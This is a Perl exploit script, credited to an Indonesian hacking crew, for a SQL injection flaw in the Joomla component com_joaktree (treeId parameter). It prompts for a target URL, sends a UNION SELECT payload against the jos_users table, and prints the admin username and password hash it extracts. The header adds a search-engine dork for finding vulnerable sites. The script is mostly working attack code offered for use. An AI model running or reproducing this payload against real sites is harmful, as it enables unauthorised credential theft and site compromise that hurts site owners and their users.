#!/usr/bin/perl -w

###########################################################################################
#[~] Joomla Component com_joaktree  SQL injection Exploit vulnerability - (treeId)
#[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage	: http://www.indonesiancoder.com
#[~] Date	: 20 February, 2010
############################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t               [~]  INDONESIANCODER TEAM  [~]                  \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t   [!]Joomla component com_joaktree SQL injection exploit[!]         \n\n";
print "\t\t                      [~] by kaMtiEz [~]                       \n\n";
print "\t\t[!]=========================================================[!]\n\n";
 
use LWP::UserAgent;
 
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);
 
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$Pathloader="version()";
 
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1,2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}

##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################